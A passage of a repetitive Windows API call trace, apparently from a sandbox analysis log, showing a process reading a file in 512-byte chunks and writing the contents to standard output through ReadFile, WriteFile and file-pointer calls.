(_OSFileHandle=0x54, _Flags=8) returned 4 [0112.721] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.721] 
GetFileType (hFile=0x54) returned 0x1 [0112.721] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.721] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x28e3bc | out: lpFileSizeHigh=0x28e3bc*=0x0) returned 0x7d600 [0112.721] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.721] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.721] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.721] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.721] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.721] GetFileType (hFile=0x4c) returned 0x1 [0112.721] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.721] GetFileType (hFile=0x4c) returned 0x1 [0112.721] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.721] WriteFile (in: hFile=0x4c, lpBuffer=0x28f1f4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.722] GetFileType (hFile=0x4c) returned 0x1 [0112.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.722] WriteFile (in: hFile=0x4c, lpBuffer=0x28f244*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f244*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.722] GetFileType (hFile=0x4c) returned 0x1 [0112.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.722] WriteFile (in: hFile=0x4c, lpBuffer=0x28f294*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f294*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.722] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0112.722] GetFileType (hFile=0x4c) returned 0x1 [0112.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.722] WriteFile (in: hFile=0x4c, lpBuffer=0x28f2e4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f2e4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.722] GetFileType (hFile=0x4c) returned 0x1 [0112.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.723] WriteFile (in: hFile=0x4c, lpBuffer=0x28f334*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f334*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.723] GetFileType (hFile=0x4c) returned 0x1 [0112.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.723] WriteFile (in: hFile=0x4c, lpBuffer=0x28f384*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f384*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.723] GetFileType (hFile=0x4c) returned 0x1 [0112.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.723] WriteFile (in: hFile=0x4c, lpBuffer=0x28f3d4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f3d4*, lpNumberOfBytesWritten=0x28e3d8*=0x20, lpOverlapped=0x0) returned 1 [0112.723] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.723] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e3c4 | out: lpNewFilePointer=0x0) returned 1 [0112.723] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.723] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, 
lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.723] GetFileType (hFile=0x4c) returned 0x1 [0112.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.723] GetFileType (hFile=0x4c) returned 0x1 [0112.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.723] WriteFile (in: hFile=0x4c, lpBuffer=0x28f1f4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.723] GetFileType (hFile=0x4c) returned 0x1 [0112.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.723] WriteFile (in: hFile=0x4c, lpBuffer=0x28f244*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f244*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.723] GetFileType (hFile=0x4c) returned 0x1 [0112.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.723] WriteFile (in: hFile=0x4c, lpBuffer=0x28f294*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f294*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.724] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.724] GetFileType (hFile=0x4c) returned 0x1 [0112.724] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.724] WriteFile (in: hFile=0x4c, lpBuffer=0x28f2e4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f2e4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.724] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.724] GetFileType (hFile=0x4c) returned 0x1 [0112.724] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.724] WriteFile (in: hFile=0x4c, lpBuffer=0x28f334*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f334*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.724] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.724] GetFileType (hFile=0x4c) returned 0x1 [0112.724] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.724] WriteFile (in: hFile=0x4c, lpBuffer=0x28f384*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f384*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.724] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.724] GetFileType (hFile=0x4c) returned 0x1 [0112.724] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.724] WriteFile (in: hFile=0x4c, lpBuffer=0x28f3d4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f3d4*, lpNumberOfBytesWritten=0x28e3d8*=0x20, lpOverlapped=0x0) returned 1 [0112.724] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.724] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e3c4 | out: lpNewFilePointer=0x0) returned 1 [0112.724] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.724] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.724] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.724] GetFileType (hFile=0x4c) returned 0x1 [0112.724] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.724] GetFileType (hFile=0x4c) returned 0x1 [0112.724] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.724] WriteFile (in: hFile=0x4c, lpBuffer=0x28f1f4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.724] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.724] GetFileType 
(hFile=0x4c) returned 0x1 [0112.724] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.724] WriteFile (in: hFile=0x4c, lpBuffer=0x28f244*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f244*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.725] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.725] GetFileType (hFile=0x4c) returned 0x1 [0112.725] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.725] WriteFile (in: hFile=0x4c, lpBuffer=0x28f294*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f294*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.725] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.725] GetFileType (hFile=0x4c) returned 0x1 [0112.725] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.725] WriteFile (in: hFile=0x4c, lpBuffer=0x28f2e4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f2e4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.725] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.725] GetFileType (hFile=0x4c) returned 0x1 [0112.725] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.725] WriteFile (in: hFile=0x4c, lpBuffer=0x28f334*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f334*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.725] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.725] GetFileType (hFile=0x4c) returned 0x1 [0112.725] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.725] WriteFile (in: hFile=0x4c, lpBuffer=0x28f384*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f384*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.725] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.725] GetFileType (hFile=0x4c) returned 0x1 [0112.725] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0112.725] WriteFile (in: hFile=0x4c, lpBuffer=0x28f3d4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f3d4*, lpNumberOfBytesWritten=0x28e3d8*=0x20, lpOverlapped=0x0) returned 1 [0112.725] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.725] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e3c4 | out: lpNewFilePointer=0x0) returned 1 [0112.725] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.725] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.725] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.725] GetFileType (hFile=0x4c) returned 0x1 [0112.725] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.725] GetFileType (hFile=0x4c) returned 0x1 [0112.725] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.725] WriteFile (in: hFile=0x4c, lpBuffer=0x28f1f4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.725] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.725] GetFileType (hFile=0x4c) returned 0x1 [0112.725] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.725] WriteFile (in: hFile=0x4c, lpBuffer=0x28f244*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f244*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.725] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.726] GetFileType (hFile=0x4c) returned 0x1 [0112.726] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.726] WriteFile (in: hFile=0x4c, lpBuffer=0x28f294*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f294*, 
lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.726] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.726] GetFileType (hFile=0x4c) returned 0x1 [0112.726] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.726] WriteFile (in: hFile=0x4c, lpBuffer=0x28f2e4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f2e4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.726] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.726] GetFileType (hFile=0x4c) returned 0x1 [0112.726] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.726] WriteFile (in: hFile=0x4c, lpBuffer=0x28f334*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f334*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.726] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.726] GetFileType (hFile=0x4c) returned 0x1 [0112.726] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.726] WriteFile (in: hFile=0x4c, lpBuffer=0x28f384*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f384*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.726] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.726] GetFileType (hFile=0x4c) returned 0x1 [0112.726] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.726] WriteFile (in: hFile=0x4c, lpBuffer=0x28f3d4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f3d4*, lpNumberOfBytesWritten=0x28e3d8*=0x20, lpOverlapped=0x0) returned 1 [0112.726] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.726] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e3c4 | out: lpNewFilePointer=0x0) returned 1 [0112.726] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.726] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.726] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.726] GetFileType (hFile=0x4c) returned 0x1 [0112.726] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.726] GetFileType (hFile=0x4c) returned 0x1 [0112.726] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.726] WriteFile (in: hFile=0x4c, lpBuffer=0x28f1f4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.726] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.726] GetFileType (hFile=0x4c) returned 0x1 [0112.726] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.726] WriteFile (in: hFile=0x4c, lpBuffer=0x28f244*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f244*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.726] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.726] GetFileType (hFile=0x4c) returned 0x1 [0112.727] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.727] WriteFile (in: hFile=0x4c, lpBuffer=0x28f294*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f294*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.727] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.727] GetFileType (hFile=0x4c) returned 0x1 [0112.727] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.727] WriteFile (in: hFile=0x4c, lpBuffer=0x28f2e4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f2e4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.727] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.727] GetFileType (hFile=0x4c) returned 0x1 [0112.727] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.727] WriteFile (in: 
hFile=0x4c, lpBuffer=0x28f334*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f334*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.727] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.727] GetFileType (hFile=0x4c) returned 0x1 [0112.727] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.727] WriteFile (in: hFile=0x4c, lpBuffer=0x28f384*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f384*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.727] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.727] GetFileType (hFile=0x4c) returned 0x1 [0112.727] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.727] WriteFile (in: hFile=0x4c, lpBuffer=0x28f3d4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f3d4*, lpNumberOfBytesWritten=0x28e3d8*=0x20, lpOverlapped=0x0) returned 1 [0112.727] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.727] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e3c4 | out: lpNewFilePointer=0x0) returned 1 [0112.727] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.727] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.727] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.727] GetFileType (hFile=0x4c) returned 0x1 [0112.727] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.727] GetFileType (hFile=0x4c) returned 0x1 [0112.727] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.727] WriteFile (in: hFile=0x4c, lpBuffer=0x28f1f4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.727] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0112.727] GetFileType (hFile=0x4c) returned 0x1 [0112.727] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.727] WriteFile (in: hFile=0x4c, lpBuffer=0x28f244*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f244*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.727] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.727] GetFileType (hFile=0x4c) returned 0x1 [0112.728] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.728] WriteFile (in: hFile=0x4c, lpBuffer=0x28f294*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f294*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.728] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.728] GetFileType (hFile=0x4c) returned 0x1 [0112.728] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.728] WriteFile (in: hFile=0x4c, lpBuffer=0x28f2e4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f2e4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.728] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.728] GetFileType (hFile=0x4c) returned 0x1 [0112.728] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.728] WriteFile (in: hFile=0x4c, lpBuffer=0x28f334*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f334*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.728] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.728] GetFileType (hFile=0x4c) returned 0x1 [0112.728] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.728] WriteFile (in: hFile=0x4c, lpBuffer=0x28f384*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f384*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.728] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0112.728] GetFileType (hFile=0x4c) returned 0x1 [0112.728] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.728] WriteFile (in: hFile=0x4c, lpBuffer=0x28f3d4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f3d4*, lpNumberOfBytesWritten=0x28e3d8*=0x20, lpOverlapped=0x0) returned 1 [0112.728] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.728] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e3c4 | out: lpNewFilePointer=0x0) returned 1 [0112.728] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.728] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.728] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.728] GetFileType (hFile=0x4c) returned 0x1 [0112.728] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.728] GetFileType (hFile=0x4c) returned 0x1 [0112.728] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.728] WriteFile (in: hFile=0x4c, lpBuffer=0x28f1f4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.728] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.728] GetFileType (hFile=0x4c) returned 0x1 [0112.728] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.728] WriteFile (in: hFile=0x4c, lpBuffer=0x28f244*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f244*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.728] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.728] GetFileType (hFile=0x4c) returned 0x1 [0112.729] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.729] WriteFile (in: hFile=0x4c, lpBuffer=0x28f294*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, 
lpOverlapped=0x0 | out: lpBuffer=0x28f294*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.729] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.729] GetFileType (hFile=0x4c) returned 0x1 [0112.729] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.729] WriteFile (in: hFile=0x4c, lpBuffer=0x28f2e4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f2e4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.729] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.729] GetFileType (hFile=0x4c) returned 0x1 [0112.729] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.729] WriteFile (in: hFile=0x4c, lpBuffer=0x28f334*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f334*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.729] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.729] GetFileType (hFile=0x4c) returned 0x1 [0112.729] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.729] WriteFile (in: hFile=0x4c, lpBuffer=0x28f384*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f384*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.729] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.729] GetFileType (hFile=0x4c) returned 0x1 [0112.729] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.729] WriteFile (in: hFile=0x4c, lpBuffer=0x28f3d4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f3d4*, lpNumberOfBytesWritten=0x28e3d8*=0x20, lpOverlapped=0x0) returned 1 [0112.729] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.729] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e3c4 | out: lpNewFilePointer=0x0) returned 1 [0112.729] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.729] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, 
